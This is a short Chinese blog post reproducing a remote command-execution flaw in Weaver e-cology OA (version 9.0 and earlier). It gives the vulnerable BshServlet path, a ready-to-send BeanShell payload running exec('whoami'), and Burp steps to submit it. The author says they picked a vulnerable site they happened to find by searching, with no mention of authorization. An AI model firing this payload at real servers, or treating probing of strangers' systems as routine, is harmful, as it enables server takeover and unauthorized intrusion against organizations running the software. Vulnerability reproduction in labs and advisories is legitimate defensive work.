记一次对泛微OA命令执行复现

最近圈子也是被泛微OA命令执行刷爆了。周一上班划水ing,想着来复现一下,顺便更新下博客。运气好随便搜索了一个就存在漏洞

0x01漏洞描述

泛微OA办公系统是一款协调办公软件。

泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

0x02漏洞危害

攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x03影响范围

泛微 e-cology<=9.0

0x04漏洞复现

漏洞路径: /weaver/bsh.servlet.BshServlet

poc:bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

访问该站域名加上漏洞路径如果存在,就有漏洞 

记一次对泛微OA命令执行复现_第1张图片

 访问后显示这样,点击按钮提交,神器burp抓包。将post内容替换先前的poc

bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

发送

记一次对泛微OA命令执行复现_第2张图片

成功复现 

你可能感兴趣的:(记一次对泛微OA命令执行复现)